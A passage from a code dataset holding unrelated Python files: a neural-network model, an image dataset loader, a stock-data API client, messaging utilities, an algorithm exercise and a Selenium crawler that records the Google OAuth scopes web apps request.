{}'.format(\n# aa,\n# key\n# )\n# )\n# logging.debug('aa: {}'.format(aa))\n# o.write(\n# ('\\t').join((\n# cds[0].contig,\n# key,\n# aa\n# )) + '\\n'\n# )\n","sub_path":"getProteinFromGff.py","file_name":"getProteinFromGff.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"290295837","text":"#-*- coding: utf-8 -*-\nfrom configparser import ConfigParser\n\ncfg = ConfigParser()\ncfg.optionxform = str # 默认会将key全部转换为lowercase, 添加此配置保持case\ncfg.read('config.ini')\n\n'''\n默认全部的value被当做字符串处理\nc.get \nc.getboolean \nc.getfloat \nc.getint\n\n字符串插值\n BasicInterpolation\n 需要在相同section或[DEFAULT]\n %(var)s\n ExtendedInterpolation\n ${var}\n 可以跨section\n\n c = ConfigParser()\n c._DEFAULT_INTERPOLATION = configparser.ExtendedInterpolation\n'''\nprint(cfg.sections())\nprint(cfg.get('installation', 'library'))\nprint(cfg.getboolean('debug', 'log_errors'))\ncfg.set('server','host','127.0.0.1')\ncfg.set('server','port','2000')\ncfg['Paths'].get('home_dir')\n\nwith open('config.ini','wt') as f:\n cfg.write(f)\n","sub_path":"backend/python/configparse/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"628852963","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torch.quantization import QuantStub, DeQuantStub\nfrom torch.nn.quantized import FloatFunctional\n\nclass DownsamplerBlock(nn.Module):\n def __init__(self, ninput, noutput) -> None:\n super(DownsamplerBlock, self).__init__()\n self.conv = nn.Conv2d(ninput, noutput-ninput, (3,3), stride=2, padding=1, bias=True)\n self.pool = nn.MaxPool2d(2, stride=2)\n self.bn = nn.BatchNorm2d(noutput, eps=1e-3)\n def forward(self, input):\n output = torch.cat([self.conv(input), self.pool(input)], axis=1)\n output = self.bn(output)\n return F.relu(output)\n \n\nclass non_bottleneck_1d(nn.Module):\n def __init__(self, chann, dropprob, dilated) -> None:\n super(non_bottleneck_1d, self).__init__()\n self.conv3x1_1 = nn.Conv2d(chann, chann, (3,1), stride=1, padding=(1,0), bias=True)\n \n self.conv1x3_1 = nn.Conv2d(chann, chann, (1,3),stride=1, padding=(0,1), bias= True)\n \n self.bn1 = nn.BatchNorm2d(chann, eps=1e-03)\n \n self.conv3x1_2 = nn.Conv2d(chann, chann, (3,1), stride=1, padding=(1*dilated,0), bias=True, dilation=(dilated,1))\n \n self.conv1x3_2 = nn.Conv2d(chann, chann,(1,3), stride= 1, padding=(0, 1*dilated), bias=True, dilation=(1, dilated))\n \n self.bn2 = nn.BatchNorm2d(chann, eps=1e-03)\n \n self.dropout = nn.Dropout2d(dropprob)\n \n \n def forward(self, input):\n output = self.conv3x1_1(input)\n output = F.relu(output)\n output = self.conv1x3_1(output)\n output = self.bn1(output)\n output = F.relu(output)\n \n output = self.conv3x1_2(output)\n output = F.relu(output)\n output = self.conv1x3_2(output)\n output = self.bn2(output)\n \n if self.dropout.p !=0:\n output = self.dropout(output)\n \n return F.relu(output +input)\n \n\nclass Encoder(nn.Module):\n def __init__(self, num_classes) -> None:\n super(Encoder, self).__init__()\n \n self.initial_block = DownsamplerBlock(3,16)\n \n self.layers = nn.ModuleList()\n \n self.layers.append(DownsamplerBlock(16,64))\n \n for x in range(0,5):\n self.layers.append(non_bottleneck_1d(64,0.03, 1))\n \n self.layers.append(DownsamplerBlock(64, 128))\n \n for x in range(0, 2):\n self.layers.append(non_bottleneck_1d(128,0.3,2))\n 
self.layers.append(non_bottleneck_1d(128, 0.3, 4))\n self.layers.append(non_bottleneck_1d(128,0.3, 8))\n self.layers.append(non_bottleneck_1d(128, 0.3, 16))\n \n self.output_conv = nn.Conv2d(128, num_classes, 1, stride=1, padding=0, bias=True)\n \n \n def forward(self, input, predict=False):\n output = self.initial_block(input)\n \n for layer in self.layers:\n output = layer(output)\n \n if predict:\n output = self.output_conv(output)\n \n return output\n \n \nclass UpsamplerBlock(nn.Module):\n def __init__(self, ninput, noutput) -> None:\n super(UpsamplerBlock, self).__init__()\n self.conv = nn.ConvTranspose2d(ninput, noutput, 3, stride= 2, padding=1, output_padding=1, bias=True)\n \n self.bn = nn.BatchNorm2d(noutput, eps=1e-3)\n \n \n def forward(self, input):\n output = self.conv(input)\n output = self.bn(output)\n return F.relu(output)\n \n\nclass Decoder(nn.Module):\n def __init__(self, num_classes) -> None:\n super(Decoder, self).__init__()\n \n self.layers = nn.ModuleList()\n \n self.layers.append(UpsamplerBlock(128, 64))\n self.layers.append(non_bottleneck_1d(64,0,1))\n self.layers.append(non_bottleneck_1d(64,0,1))\n \n self.layers.append(UpsamplerBlock(64, 16))\n self.layers.append(non_bottleneck_1d(16,0,1))\n self.layers.append(non_bottleneck_1d(16,0,1))\n \n self.output_conv = nn.ConvTranspose2d(16, num_classes, 2,stride=2,padding= 0, output_padding=0, bias=True)\n \n def forward(self, input):\n \n output = input\n \n for layer in self.layers:\n output = layer(output)\n \n output = self.output_conv(output)\n \n return output\n \nclass ERFNet(nn.Module):\n def __init__(self, num_classes= 4, encoder=None) -> None:\n super(ERFNet, self).__init__()\n \n if encoder == None:\n self.encoder = Encoder(num_classes)\n else:\n self.encoder = encoder\n \n self.decoder = Decoder(num_classes)\n \n def forward(self, input, only_encode = False):\n if only_encode:\n return self.encoder.forward(input, predict=True)\n else:\n ouput = self.encoder(input)\n return self.decoder.forward(ouput)\n \n \n \n \n \n \n \n \n \n \n ","sub_path":"models/erfnet.py","file_name":"erfnet.py","file_ext":"py","file_size_in_byte":5088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"116925031","text":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nData operations, will be used in train.py and eval.py\n\"\"\"\nimport glob\nimport os\nimport random\nimport re\nfrom functools import reduce\n\nimport mindspore.dataset as ds\nimport numpy as np\nfrom PIL import Image\n\n\ndef get_rank_info():\n \"\"\"\n get rank size and rank id\n \"\"\"\n from model_utils.moxing_adapter import get_rank_id, get_device_num\n return get_device_num(), get_rank_id()\n\n\nclass FolderImagePair:\n \"\"\"\n get image pair\n dir_patterns(list): a list of image path patterns. 
such as [\"/LR/*.jpg\", \"/HR/*.png\"...]\n the file key is matched chars from * and ?\n reader(object/func): a method to read image by path.\n \"\"\"\n\n def __init__(self, dir_patterns, reader=None):\n self.dir_patterns = dir_patterns\n self.reader = reader\n self.pair_keys, self.image_pairs = self.scan_pair(self.dir_patterns)\n\n @staticmethod\n def scan_pair(dir_patterns):\n \"\"\"\n scan pair\n \"\"\"\n images = []\n for _dir in dir_patterns:\n imgs = glob.glob(_dir)\n _dir = os.path.basename(_dir)\n pat = _dir.replace(\"*\", \"(.*)\").replace(\"?\", \"(.?)\")\n pat = re.compile(pat, re.I | re.M)\n keys = [re.findall(pat, os.path.basename(p))[0] for p in imgs]\n images.append({k: v for k, v in zip(keys, imgs)})\n same_keys = reduce(lambda x, y: set(x) & set(y), images)\n same_keys = sorted(same_keys)\n image_pairs = [[d[k] for d in images] for k in same_keys]\n same_keys = [x if isinstance(x, str) else \"_\".join(x) for x in same_keys]\n return same_keys, image_pairs\n\n def get_key(self, idx):\n return self.pair_keys[idx]\n\n def __getitem__(self, idx):\n if self.reader is None:\n images = [Image.open(p) for p in self.image_pairs[idx]]\n images = [img.convert('RGB') for img in images]\n images = [np.array(img) for img in images]\n else:\n images = [self.reader(p) for p in self.image_pairs[idx]]\n pair_key = self.pair_keys[idx]\n return (pair_key, *images)\n\n def __len__(self):\n return len(self.pair_keys)\n\n\nclass LrHrImages(FolderImagePair):\n \"\"\"\n make LrHrImages dataset\n \"\"\"\n\n def __init__(self, lr_pattern, hr_pattern, reader=None):\n self.hr_pattern = hr_pattern\n self.lr_pattern = lr_pattern\n self.dir_patterns = []\n if isinstance(self.lr_pattern, str):\n self.is_multi_lr = False\n self.dir_patterns.append(self.lr_pattern)\n elif len(lr_pattern) == 1:\n self.is_multi_lr = False\n self.dir_patterns.append(self.lr_pattern[0])\n else:\n self.is_multi_lr = True\n self.dir_patterns.extend(self.lr_pattern)\n self.dir_patterns.append(self.hr_pattern)\n super(LrHrImages, self).__init__(self.dir_patterns, reader=reader)\n\n def __getitem__(self, idx):\n _, *images = super(LrHrImages, self).__getitem__(idx)\n return tuple(images)\n\n\nclass _BasePatchCutter:\n \"\"\"\n cut patch from images\n patch_size(int): patch size, input images should be bigger than patch_size.\n lr_scale(int/list): lr scales for input images. 
Choice from [1,2,3,4, or their combination]\n \"\"\"\n\n def __init__(self, patch_size, lr_scale):\n self.patch_size = patch_size\n self.multi_lr_scale = lr_scale\n if isinstance(lr_scale, int):\n self.multi_lr_scale = [lr_scale]\n else:\n self.multi_lr_scale = [*lr_scale]\n self.max_lr_scale_idx = self.multi_lr_scale.index(max(self.multi_lr_scale))\n self.max_lr_scale = self.multi_lr_scale[self.max_lr_scale_idx]\n\n def get_tx_ty(self, target_height, target_weight, target_patch_size):\n raise NotImplementedError()\n\n def __call__(self, *images):\n target_img = images[self.max_lr_scale_idx]\n\n tp = self.patch_size // self.max_lr_scale\n th, tw, _ = target_img.shape\n\n tx, ty = self.get_tx_ty(th, tw, tp)\n\n patch_images = []\n for _, (img, lr_scale) in enumerate(zip(images, self.multi_lr_scale)):\n x = tx * self.max_lr_scale // lr_scale\n y = ty * self.max_lr_scale // lr_scale\n p = tp * self.max_lr_scale // lr_scale\n patch_images.append(img[y:(y + p), x:(x + p), :])\n return tuple(patch_images)\n\n\nclass RandomPatchCutter(_BasePatchCutter):\n\n def __init__(self, patch_size, lr_scale):\n super(RandomPatchCutter, self).__init__(patch_size=patch_size, lr_scale=lr_scale)\n\n def get_tx_ty(self, target_height, target_weight, target_patch_size):\n target_x = random.randrange(0, target_weight - target_patch_size + 1)\n target_y = random.randrange(0, target_height - target_patch_size + 1)\n return target_x, target_y\n\n\nclass CentrePatchCutter(_BasePatchCutter):\n\n def __init__(self, patch_size, lr_scale):\n super(CentrePatchCutter, self).__init__(patch_size=patch_size, lr_scale=lr_scale)\n\n def get_tx_ty(self, target_height, target_weight, target_patch_size):\n target_x = (target_weight - target_patch_size) // 2\n target_y = (target_height - target_patch_size) // 2\n return target_x, target_y\n\n\ndef hflip(img):\n return img[:, ::-1, :]\n\n\ndef vflip(img):\n return img[::-1, :, :]\n\n\ndef trnsp(img):\n return img.transpose(1, 0, 2)\n\n\nAUG_LIST = [\n [],\n [trnsp],\n [vflip],\n [vflip, trnsp],\n [hflip],\n [hflip, trnsp],\n [hflip, vflip],\n [hflip, vflip, trnsp],\n]\n\nAUG_DICT = {\n \"0\": [],\n \"t\": [trnsp],\n \"v\": [vflip],\n \"vt\": [vflip, trnsp],\n \"h\": [hflip],\n \"ht\": [hflip, trnsp],\n \"hv\": [hflip, vflip],\n \"hvt\": [hflip, vflip, trnsp],\n}\n\n\ndef flip_and_rotate(*images):\n aug = random.choice(AUG_LIST)\n res = []\n for img in images:\n for a in aug:\n img = a(img)\n res.append(img)\n return tuple(res)\n\n\ndef hwc2chw(*images):\n res = [i.transpose(2, 0, 1) for i in images]\n return tuple(res)\n\n\ndef uint8_to_float32(*images):\n res = [(i.astype(np.float32) if i.dtype == np.uint8 else i) for i in images]\n return tuple(res)\n\n\ndef create_dataset_DIV2K(config, dataset_type=\"train\", num_parallel_workers=10, shuffle=True):\n \"\"\"\n create a train or eval DIV2K dataset\n Args:\n config(dict):\n dataset_path(string): the path of dataset.\n scale(int/list): lr scale, read data ordered by it, choices=(2,3,4,[2],[3],[4],[2,3],[2,4],[3,4],[2,3,4])\n lr_type(string): lr images type, choices=(\"bicubic\", \"unknown\"), Default \"bicubic\"\n batch_size(int): the batch size of dataset. (train prarm), Default 1\n patch_size(int): train data size. (train param), Default -1\n epoch_size(int): times to repeat dataset for dataset_sink_mode, Default None\n dataset_type(string): choices=(\"train\", \"valid\", \"test\"), Default \"train\"\n num_parallel_workers(int): num-workers to read data, Default 10\n shuffle(bool): shuffle dataset. 
Default: True\n Returns:\n dataset\n \"\"\"\n dataset_path = config[\"dataset_path\"]\n lr_scale = config[\"scale\"]\n if config[\"eval_type\"] == \"ONNX\":\n lr_type = config.get(\"lr_type\", \"bicubic_AUG_self_ensemble\")\n else:\n lr_type = config.get(\"lr_type\", \"bicubic\")\n batch_size = config.get(\"batch_size\", 1)\n patch_size = config.get(\"patch_size\", -1)\n epoch_size = config.get(\"epoch_size\", None)\n\n # for multi lr scale, such as [2,3,4]\n if isinstance(lr_scale, int):\n multi_lr_scale = [lr_scale]\n else:\n multi_lr_scale = lr_scale\n\n # get HR_PATH/*.png\n dir_hr = os.path.join(dataset_path, f\"DIV2K_{dataset_type}_HR\")\n hr_pattern = os.path.join(dir_hr, \"*.png\")\n\n # get LR_PATH/X2/*x2.png, LR_PATH/X3/*x3.png, LR_PATH/X4/*x4.png\n column_names = []\n lrs_pattern = []\n for lr_scale in multi_lr_scale:\n dir_lr = os.path.join(dataset_path, f\"DIV2K_{dataset_type}_LR_{lr_type}\", f\"X{lr_scale}\")\n if config[\"eval_type\"] == \"ONNX\":\n lr_pattern = os.path.join(dir_lr, f\"*x{lr_scale}_0.png\")\n else:\n lr_pattern = os.path.join(dir_lr, f\"*x{lr_scale}.png\")\n # if dataset_type == \"train\":\n # lr_pattern = os.path.join(dir_lr, f\"*x{lr_scale}.png\")\n # else:\n # lr_pattern = os.path.join(dir_lr, f\"*.png\")\n lrs_pattern.append(lr_pattern)\n column_names.append(f\"lrx{lr_scale}\")\n column_names.append(\"hr\") # [\"lrx2\",\"lrx3\",\"lrx4\",..., \"hr\"]\n\n # make dataset\n dataset = LrHrImages(lr_pattern=lrs_pattern, hr_pattern=hr_pattern)\n\n # make mindspore dataset\n device_num, rank_id = get_rank_info()\n if device_num == 1 or device_num is None:\n generator_dataset = ds.GeneratorDataset(dataset, column_names=column_names,\n num_parallel_workers=num_parallel_workers,\n shuffle=shuffle and dataset_type == \"train\")\n elif dataset_type == \"train\":\n generator_dataset = ds.GeneratorDataset(dataset, column_names=column_names,\n num_parallel_workers=num_parallel_workers,\n shuffle=shuffle and dataset_type == \"train\",\n num_shards=device_num, shard_id=rank_id)\n else:\n sampler = ds.DistributedSampler(num_shards=device_num, shard_id=rank_id, shuffle=False,\n offset=0)\n generator_dataset = ds.GeneratorDataset(dataset, column_names=column_names,\n num_parallel_workers=num_parallel_workers,\n sampler=sampler)\n\n # define map operations\n if dataset_type == \"train\":\n transform_img = [\n RandomPatchCutter(patch_size, multi_lr_scale + [1]),\n flip_and_rotate,\n hwc2chw,\n uint8_to_float32,\n ]\n elif patch_size > 0:\n transform_img = [\n CentrePatchCutter(patch_size, multi_lr_scale + [1]),\n hwc2chw,\n uint8_to_float32,\n ]\n else:\n transform_img = [\n hwc2chw,\n uint8_to_float32,\n ]\n\n # pre-process hr lr\n generator_dataset = generator_dataset.map(input_columns=column_names,\n output_columns=column_names,\n operations=transform_img)\n\n # apply batch operations\n generator_dataset = generator_dataset.batch(batch_size, drop_remainder=False)\n\n # apply repeat operations\n if dataset_type == \"train\" and epoch_size is not None and epoch_size != 1:\n generator_dataset = generator_dataset.repeat(epoch_size)\n\n return generator_dataset\n","sub_path":"research/cv/GhostSR/src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":11555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"519886052","text":"import unittest\nfrom my_decorators import accepts, say_hello, deposit, encrypt, get_low\n\n\nclass MyDecoratorsTests(unittest.TestCase):\n\n def test_accepts(self):\n with 
self.subTest(\"test say_hello raise TypeError\"):\n with self.assertRaises(TypeError):\n say_hello(4)\n\n with self.subTest(\"test deposit raise TypeError\"):\n with self.assertRaises(TypeError):\n deposit(4, [])\n\n def test_encript(self):\n expected = \"Igv igv igv nqy\"\n self.assertEqual(expected, get_low())\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"week06/test_my_decorators.py","file_name":"test_my_decorators.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"321617423","text":"import datetime\nimport os\nimport requests\nimport pandas as pd\nimport time\nimport random\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\nfrom dotenv import load_dotenv\nfrom typing import Union, List\nfrom . import Types\nload_dotenv()\n\n\ntradier_url = 'https://api.tradier.com'\n\n\ndef load_env_file(path: str):\n load_dotenv(path)\n\n\ndef _get_historical(symbol: Types.Symbol, start: Union[None, Types.Datetime] = None, end: Union[None, Types.Datetime] = None, rate_limit: bool = False):\n def process_frame(sf: Types.StockFrame, symbol: Types.Symbol):\n sf = sf.dropna()\n sf = sf.rename(columns={'date': 'timestamp'})\n sf['symbol'] = symbol.upper()\n sf['timestamp'] = pd.to_datetime(sf['timestamp'], utc=True)\n sf['timestamp'] = sf['timestamp'].dt.tz_convert('US/Eastern')\n sf['timestamp'] = sf['timestamp'].apply(lambda x: (\n x + datetime.timedelta(hours=12)).replace(hour=16, minute=30))\n sf = sf.drop_duplicates(subset=['timestamp'])\n sf = sf.set_index('timestamp')\n return sf\n\n if rate_limit:\n time.sleep(random.randrange(1, 20) / 10.0)\n\n url = '%s/v1/markets/history' % tradier_url\n params = {\n 'symbol': symbol.upper(),\n 'interval': 'daily',\n }\n if start is not None:\n params['start'] = start.strftime('%Y-%m-%d')\n if end is not None:\n params['end'] = end.strftime('%Y-%m-%d')\n\n headers = {\n 'Authorization': 'Bearer %s' % os.getenv('TRADIER_TOKEN'),\n 'Accept': 'application/json'\n }\n\n response = requests.get(url, params=params, headers=headers)\n try:\n json_response = response.json()\n sf: Types.StockFrame = pd.DataFrame(json_response['history']['day'])\n sf = process_frame(sf, symbol)\n return sf\n except:\n print('%s from %s to %s failed' %\n (symbol, params['start'], params['end']))\n return None\n\n\ndef get_historical(symbols: List[Types.Symbol], start: Union[None, Types.Datetime] = None, end: Union[None, Types.Datetime] = None):\n jobs = []\n pool = Pool(processes=10)\n\n for symbol in symbols:\n jobs.append(pool.apply_async(func=_get_historical,\n args=(symbol, start, end, True)))\n pool.close()\n results = []\n for job in tqdm(jobs):\n results.append(job.get())\n\n return [i for i in results if i is not None]\n","sub_path":"src/MarketGym/TradierLib.py","file_name":"TradierLib.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"588816564","text":"#! 
/usr/bin/python\n#coding=utf-8\n\n\"\"\"Collection of utility helpers\"\"\"\nimport urllib\nimport socket\nimport time\nimport chardet\nfrom lxml import etree\nfrom impt import msgResolver, smsproxy, mongodb, db_user, db_nochk, rroster_tablename\n\nMsg = msgResolver()\nUDPSOCK = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ndef encode_utf8(data):\n    \"\"\"Convert the input to UTF-8 and return it\"\"\"\n    '''\n    if isinstance(data, unicode):\n        return data.encode(\"utf-8\")\n    elif not isinstance(data, str):\n        return str(data)\n    else:\n        return data\n    '''\n    temp = bs2unicode(data)\n    return temp.encode('utf-8') if isinstance(temp, unicode) else temp\n\ndef bs2unicode(basestr):\n    if not isinstance(basestr, basestring):\n        return basestr\n\n    if isinstance(basestr, unicode):\n        return basestr\n\n    encode = chardet.detect(basestr).get('encoding')\n    return basestr.decode(encode)\n\ndef xml_reg_user_presence(user_list, iq_from, iq_type):\n    \"\"\"Build the presence-subscription XML\"\"\"\n    xml = etree.XML(\"\")\n\n    attr = xml.attrib\n    attr['from'] = iq_from\n    attr['type'] = iq_type\n\n    for user in user_list:\n        u_xml = etree.Element(\"user\")\n        xml_text(u_xml, user)\n        xml[0].append(u_xml)\n\n    return xml\n\ndef protocol_to_ims():\n    \"\"\"\n    Gateway-to-IMS protocol translation.\n    See logic_browser.py, the dispatch function:\n\n    try:\n        logic_func = self.logic_dispatch[request['invoke']]\n        logic_func(request, uid)\n    except KeyError:\n        # protocol translation and forwarding\n        self.users.save_info(uid, 'r_sn', request['sn'])\n        self.toims(header, uid)\n\n    So once a logic operation raises KeyError, the program falls through to the\n    protocol-forwarding branch; only usable during the synchronous part of a logic_func.\n    \"\"\"\n    raise KeyError\n\ndef request_to_buf(request):\n    \"\"\"Rebuild the raw buffer; no argument validation, use with care\"\"\"\n    argbuf = ''\n    for key in request:\n        if key not in ['invoke', 'sn', 'sid', 'callback', 'rnd']:\n            argbuf += \"%s=%s&\" % (key, request[key])\n\n    buf = 'invoke=%s&sn=%s&sid=%s&%scallback=_imback&rnd=%s' % (\n        request['invoke'], request['sn'], request['sid'], argbuf, \n        request['rnd'])\n\n    return buf\n\n\ndef protocol_to_ims_async(request, username, conn):\n    \"\"\"Asynchronous operation during a logic_func\"\"\"\n\n    buf = request_to_buf(request)\n\n    datas = Msg.b2gw(buf, username)\n    if not datas:\n        return \n    \n    conn.sendto_ims(datas[4], request['sid']) \n\ndef url_unquote(request):\n    \"\"\"Unquote every value in the dict\"\"\"\n    for key in request:\n        request[key] = urllib.unquote(request[key])\n\ndef xml_set(xml, attr, value):\n    \"\"\"XML wrapper function\"\"\"\n    if value == None:\n        xml.set(attr, \"\")\n        return\n\n    if isinstance(value, unicode):\n        xml.set(attr, value)\n        return \n\n    try:\n        xml.set(attr, value.decode(\"utf-8\"))\n    except UnicodeEncodeError:\n        xml.set(attr, \"\")\n\ndef xml_text(xml, text):\n    \"\"\"XML wrapper function\"\"\"\n    if text == None:\n        xml.text = None\n        return\n    \n    if isinstance(text, unicode):\n        xml.text = text\n        return \n    \n    try:\n        xml.text = text.decode(\"utf-8\")\n    except UnicodeDecodeError:\n        return \n\n\ndef sms_send(telno, msg, send_time = None):\n    \"\"\"Send an SMS\"\"\"\n    if not send_time:\n        send_time = int(time.time())\n\n    cmd = \"1401_%s_%s_%s\" % (telno, send_time, msg)\n\n    UDPSOCK.sendto(cmd, smsproxy)\n    \n\ndef utf8_hexstr(string):\n    \"\"\"Render a UTF-8 string as hex escapes\"\"\"\n    buf = ''\n    for letter in string:\n        buf += r\"\\x%x\" % ord(letter)\n    \n    return buf\n\ndef rbuddy_refresh(rbuddy_list, to, username, conn):\n    \"\"\"Refresh the recent-contacts list\"\"\"\n    rbuddy_list.push(to)\n\n    db = mongodb(db_user)\n    table = db[rroster_tablename]\n    cmd = table.update({'userid': username}, {'userid': username, \\\n        'rbuddy':rbuddy_list.items()}, upsert = True) \n\n    conn.db_opt(cmd, db_nochk, None)\n","sub_path":"python/server/serverd/logic/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"424044479","text":"n = int(input())\narr = []\n\nfor _ in range(n):\n    x, y = list(map(int, input().split()))\n    arr.append([x, y])\n\ndef cal(a, b):\n    x1, y1 = a\n    x2, y2 = b\n\n    n1 = pow(x1 - x2, 2)\n    n2 = pow(y1 - y2, 2)\n\n    result = n1 + n2\n\n    return result\n\n\ndef _2261(arr):\n    min_r = 500\n    \n    n = len(arr)\n    \n    if(n == 1):\n        return min_r\n\n    if(n == 2):\n        min_r = cal(arr[0], arr[1])\n        return min_r\n    \n    m = n // 2\n    \n    left = _2261(arr[:m])\n    right = _2261(arr[m:])\n    middle = cal(arr[m-1],arr[m])\n\n    result = min(left, right, min_r, middle)\n\n    return result\n\narr.sort(key = lambda x : (x[0],x[1]))\nhmm = _2261(arr)\narr.sort(key = lambda x : (x[1],x[0]))\nhmm2 = _2261(arr)\n\nresult = min(hmm, hmm2)\n\nprint(result)","sub_path":"by category/divide&conquer/2261.py","file_name":"2261.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"626187916","text":"'''\nCreated by gluthier on 10/01/2016\n'''\n\nimport json\nimport re\nimport time\nimport sys\nfrom lxml import etree\nimport selenium.webdriver as webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom io import StringIO\n\nscopes = {\n\t'drive[^.]': 'https://www.googleapis.com/auth/drive',\n\t'drive.readonly': 'https://www.googleapis.com/auth/drive.readonly',\n\t'drive.appfolder': 'https://www.googleapis.com/auth/drive.appfolder',\n\t'drive.apps.readonly': 'https://www.googleapis.com/auth/drive.apps.readonly',\n\t'drive.file': 'https://www.googleapis.com/auth/drive.file',\n\t'drive.install': 'https://www.googleapis.com/auth/drive.install',\n\t'drive.metadata[^.]': 'https://www.googleapis.com/auth/drive.metadata',\n\t'drive.metadata.readonly': 'https://www.googleapis.com/auth/drive.metadata.readonly',\n\t'drive.photos.readonly': 'https://www.googleapis.com/auth/drive.photos.readonly',\n\t'drive.scripts': 'https://www.googleapis.com/auth/drive.scripts',\n\t'drive.appdata': 'https://www.googleapis.com/auth/drive.appdata',\n\t'userinfo.email': 'https://www.googleapis.com/auth/userinfo.email',\n\t'userinfo.profile': 'https://www.googleapis.com/auth/userinfo.profile',\n\t'plus.login': 'https://www.googleapis.com/auth/plus.login',\n\t'plus.me': 'https://www.googleapis.com/auth/plus.me',\n\t'plus.profiles.read': 'https://www.googleapis.com/auth/plus.profiles.read',\n\t'calendar[^.]': 'https://www.googleapis.com/auth/calendar',\n\t'calendar.readonly': 'https://www.googleapis.com/auth/calendar.readonly'\n}\n\ncandidates = ['drive', 'google', 'oauth', 'authorize', 'sign', 'login', 'load', 'open', 'account', 'select', 'start', 'log']\n\ndef retrievePermissions(url):\n\tfound = False\n\ttry:\n\t\tfor s in scopes:\n\t\t\tp = re.compile('https(?:%3A|:)(?:%2F|/){2}www.googleapis.com(?:%2F|/)auth(?:%2F|/)('+s+')')\n\t\t\tif p.search(url):\n\t\t\t\tfound = True\n\t\t\t\tprint(\" \" + scopes[s])\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef closeEventualAlert(driver):\n\ttry:\n\t\tWebDriverWait(driver, 1).until(EC.alert_is_present())\n\t\talert = driver.switch_to_alert()\n\t\talert.accept()\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef clickElement(xpath, follow, 
driver):\n\tfound = False\n\tmain_window = driver.current_window_handle\n\tmain_window_url = driver.current_url\n\tbefore_click_page_len = len(driver.page_source)\n\tlen_page_after_click_diff = False\n\ttry:\n\t\telem = driver.find_element_by_xpath(xpath)\n\t\tif elem and elem.is_displayed():\n\t\t\telem.click()\n\t\t\tcloseEventualAlert(driver)\n\t\t\t# check if click changed the content of the page\n\t\t\tif len(driver.page_source) != before_click_page_len:\n\t\t\t\tlen_page_after_click_diff = True\n\t\t\tfor handle in driver.window_handles:\n\t\t\t\tdriver.switch_to.window(handle)\n\t\t\t\tcurrent_url = driver.current_url\n\t\t\t\tif follow:\n\t\t\t\t\t# if we want to retrieve the permissions after the click\n\t\t\t\t\tfound = retrievePermissions(current_url)\n\t\t\t\tif current_url != main_window_url:\n\t\t\t\t\tdriver.back()\n\t\t\t\t\tcloseEventualAlert(driver)\n\t\t\t\tif handle != main_window:\n\t\t\t\t\tdriver.close()\n\t\t\t\t\tcloseEventualAlert(driver)\n\t\t\t\tdriver.switch_to_window(main_window)\n\t\treturn found, len_page_after_click_diff # return also if the click changed the page\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef findElementsInPage(driver):\n\txpaths = []\n\ttry:\n\t\thtml = driver.page_source\n\t\ttree = etree.parse(StringIO(html)) # build a tree from a page\n\t\tfor elem in tree.iter():\n\t\t\txpath = tree.getpath(elem)\n\t\t\tif xpath and \"()\" not in xpath: # avoid xpath of this kind: /*/*[2]/comment()[1]\n\t\t\t\te = driver.find_element_by_xpath(xpath)\n\t\t\t\tif e:\n\t\t\t\t\tcandidate_found = False\n\t\t\t\t\tfor c in candidates:\n\t\t\t\t\t\tif str(e.get_attribute('id')).lower().find(c) >= 0 or str(e.get_attribute('title')).lower().find(c) >= 0 or str(e.get_attribute('class')).lower().find(c) >= 0 or str(e.text).lower().find(c) >= 0:\n\t\t\t\t\t\t\tcandidate_found = True\n\t\t\t\t\t\t\tif xpath not in xpaths:\n\t\t\t\t\t\t\t\txpaths.append(xpath)\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\tfinally:\n\t\trelevant_xpaths = []\n\t\tfor xp in xpaths:\n\t\t\t(found, page_diff) = clickElement(xp, True, driver)\n\t\t\tif found:\n\t\t\t\treturn True, relevant_xpaths\n\t\t\tif page_diff:\n\t\t\t\trelevant_xpaths.append(xp)\n\t\treturn False, relevant_xpaths\n\ndef crawlPage(url, xpaths, driver):\n\tfound = False\n\ttry:\n\t\tdriver.get(url)\n\t\tcloseEventualAlert(driver)\n\t\tfound = retrievePermissions(url)\n\t\tif not found:\n\t\t\t# initial call\n\t\t\tif not xpaths:\n\t\t\t\t(found, new_xpaths) = findElementsInPage(driver)\n\t\t\t\tif not found and new_xpaths:\n\t\t\t\t\tfound = crawlPage(url, new_xpaths, 